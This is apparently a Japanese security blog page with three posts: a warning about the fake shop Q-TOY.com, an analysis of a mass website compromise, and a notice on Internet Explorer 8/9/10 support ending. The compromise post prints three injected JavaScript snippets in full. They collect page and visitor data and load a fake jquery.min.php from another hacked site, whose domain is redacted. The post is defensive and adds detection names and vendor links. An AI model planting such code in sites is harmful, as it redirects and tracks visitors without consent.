無題なログ

セキュリティ情報、迷惑メール、フィッシング詐欺、Windows の小ネタを書いているブログです (*^ー^)ノ

2015/11

疑惑のQ-TOY.comホビー通販サイト? 詐欺と一瞬で見抜くポイント1つ!
 
イメージ 1
フィギュア通販の総合サイト,書籍,おもちゃ,ゲーム,ホビー予約
Q-TOY本店-フィギュア、プラモデルの通販の総合ホビーショップです。バンダイコレクターズなどの人気商品や、アゾンなどのドール、フィギュア、プラモデルなど取り扱っております。ぜひ、お越しくださいませ。
Q-TOY.com(キュートーイ?) を名乗る日本語表記のネット通販サイトが確認されてるようで、ここの評価・評判を尋ねる質問がYahoo!知恵袋に投稿されてます。
 
■ 昨日、Q-TOYというフィギュアなどを取り扱う通販サイトから購入手続きしたのですが、商品注文受理のメールも届かず振込をする口座番号もわからないままで、サイトの運営者にお問い合わせとしてメッセージ送ったのですが、返事がきません。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q12147616342
 
■ 欲しい物を探して色々調べていたらq-toy.comってホビー屋さんに行きあたりました。しかも探していた商品の在庫が異常に豊富。でもサイト内の字の読みづらさに違和感を覚えました。。ここってもしかして?
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q11146892836
 
■ このショッピングサイトは、詐欺サイトですか?? 詳しく教えてください!
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q13148248963
 
■ こちらのショップは詐欺サイトですか?
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q13148142123
 
結論から言うと、海外のサイバー犯罪者が日本のユーザーを騙して購入代金を盗み取るために用意した詐欺目的の偽通販サイトです。
 
ただ、それに気づかず、入手困難な目ぼしいホビー商品を見つけた達成感だけで勢いよく注文に走るユーザーさんがいて危なっかしいですネ。
 
実は、この手の詐欺サイトはネット上に溢れていて、以前から警察消費者センターがダマされないよう注意喚起してます。
 
通信販売サイトでのトラブルにご用心! 警視庁
http://www.keishicho.metro.tokyo.jp/sodan/nettrouble/jirei/net_order_site.html
 
前払いのネット通販に注意!~お金を振り込んだのに商品が届かないトラブルが多発しています!~ 東京都

ここを見ると一瞬で詐欺と判断できる!

話を疑惑の Q-TOY.com に戻すけど、実はこの通販サイトのある特定ページをチェックすると、一瞬でインチキと分かるので紹介します。 <自衛できる知識を伝授!
 
ネット通販という性質上、相手の顔が見えないので、『おまえさんはドコのダレ?』という疑問を解決するため会社概要を確認してみると不自然なところが…!
 
イメージ 2
通販サイトの会社概要ページから引用
 
会社名 → 記載あり 「株式会社Q-TOY本店」
所在地 → 記載あり ただし「埼玉」???
責任者の氏名 → 記載あり 「直都 松本」 ただし苗字と名前が逆???
電話番号 → 記載なし
 
」なる見たことない漢字が登場するけど、これは「」の中国語表記ですゾ! …ってな豆知識は置いといて、致命的なのが電話番号が書かれていないところ。
 
日本には特定商取引法(とくてい しょうとりひきほう)という法律で、運営者は所在地、責任者の氏名、電話番号を通販ユーザーさんに提示しましょう♪、ってなルールが存在します。
 
つまり、この通販サイト Q-TOY.com はそれを堂々と破って法律違反してることを身を呈してさらけ出してるワケです。 <危険! ゼッタイに近づいてはダメ!
 

Amazon.co.jp | 通販 - ファッション、家電から食品まで【通常配送無料】
 

Yahoo!ショッピング - Tポイントが貯まる!使える!ネット通販
 
このエントリーをはてなブックマークに追加

リダイレクト改ざんvar a setTimeout jquery.min.php JavaScriptコード
 
{{{ 2016年2月 更新 }}}
 
Google検索などを経由してアクセスしてきたら、別の不正なページへ強制リダイレクトさせる不正なJavaScriptコードが確認されてます! <勝手に強制転送
  • JavaScriptコードの挿入位置
    <head>タグ終端の直前に<script>~</script>タグが挿入される
     
  • 改ざんされる原因?
    WordPress を利用したサイトやブログが侵害されてるので、旧バージョンの脆弱性がらみで第三者がサーバーへ不正アクセス? あるいは管理パスワードがテキトーすぎ?
    Joomla! を利用してるサーバーも侵害されてるらしい
この不正なJavaScriptコードが挿入されるハッキング被害が、日本も含め世界中の正規サイトでたくさん起こってる感じ? <「怪しいサイト」ではないところばかり…
 
侵害されてる一般サイトの改ざん状況
 
イメージ 1
 
イメージ 2
 
イメージ 3
 
挿入される不正なJavaScriptコード
<script>var a = '';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type ="text/javascript" src ="' + 'http //[別の侵害さたサイトのドメイン名]/ js/ jquery.min.php' + '?key=**' + '&utm_campaign=' + '*****' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
</head>
<body>
<script>var a = '; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http //[別の侵害さたサイトのドメイン名]/ js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
</head>
<body>
<script>var a = '';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src = "http://[別の侵害さたサイトのドメイン名]/ js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://[別の侵害さたサイトのドメイン名]/ js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
</head>
<body>
【ウイルス検出名】
Avast JS:Injection-A JS:Injection-I
AVG JS/Redir
Avira HTML/Infected.WebPage.Gen6 HTML/ExpKit.Gen2
ESET JS/TrojanDownloader.FakejQuery.A
McAfee JS/Redirector.db
Microsoft Trojan:JS/Redirector.QE Trojan:JS/Redirector.QD
Sophos Troj/JSRedir-RX
 
別ドメインに設置された『 ~/js/jquery.min.php 』を読み込むようになっていて正規のJavaScriptライブラリ jQuery と似せたファイル名で正規の処理と思い込ませようとしてますかい。
 
jQuery.min.php Malware Affects Thousands of Websites - Sucuri
https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of-websites.html
 
大量インジェクションにより、全世界で数千の Web サイトが感染 Web Attack: Mass Injection Website 19 | Symantec
http://www.symantec.com/connect/blogs/web-11
関連するブログ記事
WordPressブログ改ざん被害 1Aqapkrv'02v JavaScriptコード挿入
FilesMan? 運営サイトがハッキングされバックドアがサーバーに設置される
tag5479347351 iframeハッキングtag1.php Backdoor Kelihos感染ボットネット
危険Web Diary Professional! ハッキングで通販詐欺サイト誘導ページ作成被害
このエントリーをはてなブックマークに追加

Internet Explorer 8/9/10サポート終了! Windows7パソコン2016年1月から
 
Windows 7搭載パソコンから利用できるマイクロソフトの標準ブラウザ
 
Internet Explorer 8/9/10
 
のサポートが2016年1月12日(日本時間だと13日)をもって終了だそう。
  • Internet Explorer 8 (IE8) ⇒ サポート終了
  • Internet Explorer 9 (IE9) ⇒
  • Internet Explorer 10 (IE10) ⇒
  • Internet Explorer 11 (IE11) ⇒ 継続サポート
Internet Explorerサポートポリシー変更の重要なお知らせ - Microsoft
https://www.microsoft.com/ja-jp/windows/lifecycle/iesupport/
 
厄介なことだけど、Internet Explorer ブラウザで今後見つかるであろう脆弱性(セキュリティ上の欠陥)が発覚し、それを悪用したウイルス感染攻撃が将来もし始まったとしても、それを防ぐ手立てが困難な状況になります。
  1. IEが起動できなくなって使えなくなるワケではない
    (2014年にサポート終了した Windows XP と同じ)
     
  2. 2016年1月を境にいきなり危険状態に突入するワケではない
    (時間の経過とともに危険性が増していく)
マイクロソフトのサポートが継続される Internet Explorer 11(IE11) なら、Windows Update 経由で更新パッチが今後も配信され、問題の修正は行われるけど…。

Windows 8 や Windows 10は?

ちなみに、Windows 8搭載パソコン は同じタイミングで Windows OS そのもののサポートが終了するので、Windows 8.1(またはWindows 10)へ更新しないとダメ!
  • Windows 8 ⇒ OS自体のサポート終了
  • Windows 8.1 ⇒ IEブラウザのサポート終了影響なし 
  • Windows 10 ⇒ 〃
このエントリーをはてなブックマークに追加

↑このページのトップヘ